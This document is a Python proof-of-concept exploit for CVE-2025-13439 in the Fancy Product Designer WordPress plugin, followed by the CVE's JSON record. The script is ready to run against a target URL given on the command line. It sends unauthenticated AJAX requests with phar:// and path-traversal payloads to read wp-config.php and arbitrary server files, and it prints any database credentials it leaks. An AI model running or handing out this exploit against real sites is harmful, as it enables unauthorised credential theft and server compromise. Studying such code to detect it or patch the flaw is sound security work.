CVE-2025-13439

# CVE-2025-13439 PoC - Fancy Product Designer Information Disclosure # Target: WordPress site with Fancy Product Designer plugin <= 6.4.8 import requests import sys def cve_2025_13439_poc(target_url): """ Information Disclosure PoC for CVE-2025-13439 This exploits the lack of validation in fpd_custom_uplod_file AJAX action """ # Target endpoint for AJAX action ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Construct malicious payload to read wp-config.php # Using phar:// wrapper to trigger deserialization payload = { 'action': 'fpd_custom_uplod_file', 'url': 'phar://../../../../wp-config.php' } try: print(f"[*] Sending request to {ajax_url}") print(f"[*] Payload: {payload}") response = requests.post(ajax_url, data=payload, timeout=30) if response.status_code == 200: print(f"[+] Request successful") print(f"[*] Response length: {len(response.text)} bytes") # Check if sensitive data was leaked if 'DB_NAME' in response.text or 'DB_USER' in response.text: print("[!] VULNERABLE - wp-config.php content leaked!") print(response.text[:500]) return True else: print("[*] Response received, manual verification needed") print(response.text[:200]) else: print(f"[-] Request failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False # Alternative PoC - Direct file read via path traversal def alternative_poc(target_url, file_path): """ Alternative PoC using path traversal """ ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Path traversal to read arbitrary files payload = { 'action': 'fpd_custom_uplod_file', 'url': f'../../../../{file_path}' } try: response = requests.post(ajax_url, data=payload, timeout=30) if response.status_code == 200: return response.text except: return None if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-13439.py <target_url>") print("Example: python cve-2025-13439.py http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') cve_2025_13439_poc(target)

{"cve": {"id": "CVE-2025-13439", "sourceIdentifier": "[email protected]", "published": "2025-12-16T08:15:51.753", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Fancy Product Designer plugin for WordPress is vulnerable to Information Disclosure and PHAR Deserialization in all versions up to, and including, 6.4.8. This is due to insufficient validation of user-supplied input in the 'url' parameter of the 'fpd_custom_uplod_file' AJAX action, which flows directly into the 'getimagesize' function without sanitization. This makes it possible for unauthenticated attackers to read arbitrary sensitive files from the server, including wp-config.php."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://support.fancyproductdesigner.com/support/discussions/topics/13000036024", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4fd6df9d-2963-44b1-bc4e-e53eda97a2a9?source=cve", "source": "[email protected]"}]}}